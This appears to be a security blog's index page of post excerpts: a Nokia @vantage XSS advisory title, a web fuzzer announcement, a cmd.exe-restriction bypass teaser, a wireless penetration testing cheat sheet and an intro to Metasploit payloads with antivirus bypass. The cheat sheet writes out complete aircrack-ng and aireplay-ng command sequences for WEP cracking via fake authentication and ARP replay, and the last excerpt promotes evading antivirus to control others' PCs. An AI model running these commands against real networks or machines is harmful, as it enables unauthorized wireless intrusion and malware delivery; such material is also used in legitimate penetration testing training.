Nokia Solutions and Networks @vantage – Multiple Reflected XSS (CVE-2015-6929)

Posted on Updated on

Document Title:
==============
Nokia Solutions and Networks @vantage - Multiple Reflected XSS

Release Date:
============
9 Sep 2015

 Read the rest of this entry »
Advertisements

uckFuzzer – Web Application Fuzzing Tool

Posted on Updated on

Selamlar;
Web uygulama testlerinin başında sistem hakkında bilgi elde etme gelir. Bu bilgi elde etme (information gathering) aşamalarından birisi de Fuzzing… Bunu gerçekleştirirken de Linux’da veya Windows’da kullanabileceğimiz birçok araç mevcut. Bizde bu birçok aracın yanında; Windows’da çalışabilen, .NET ile masaüstü için yazılmış, multi-thread mantığıyla çalışan etkili bir araç yapalım dedik.

Sonunda böyle bir uygulama ortaya çıktı;

Read the rest of this entry »

Bypass disabled “cmd.exe” on the Windows

Posted on Updated on

If you get on a machine(Windows) that has cmd.exe disabled or just not available. Follow my steps ; All you need is “browse” 😉

Open any browse dialog & go to directory (Windows/System32). Here is the trick;

Read the rest of this entry »

Wireless Penetration Testing Cheat Sheet

Posted on Updated on


WIRELESS ANTENNA


Kill Monitor Processes

root@uceka:~# airmon-ng check kill

Open the Monitor Mode

root@uceka:~# ifconfig wlan0 down
root@uceka:~# airmon-ng start wlan0
# if you get an error with airmon-ng command, try this ;
# iwconfig wlan0 mode monitor
root@uceka:~# ifconfig wlan0 up

Increase Wi-Fi TX Power

root@uceka:~# iw reg set B0
root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
#txpower is 30 (generally)
#txpower is depends your country, please googling
root@uceka:~# iwconfig

Change WiFi Channel

root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)>

WEP CRACKING


 Method 1 : Fake Authentication Attack

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
root@uceka:~# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Method 2 : ARP Replay Attack

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Read the rest of this entry »

Generating Payloads & Anti-Virus Bypass Methods

Posted on Updated on

Hi everyone… This article aboot is malicious stuff. How we can create payload? How we can connect & listen other’s pc… Yeap,they are all possible with Metasploit or other similar tools. Also; it’s safe for you. You don’t need to use any stealer,keylogger,crypter… Metasploit already has all of it 😉
Follow my steps…

My test machine is ; Windows 7 on the Virtual Machine & Windows 8
Local host ip : 10.34.0.62 (Backtrack 5 R3)
Local port : 4444

You can start with msfconsole or you can directly call meterpreter…
Read the rest of this entry »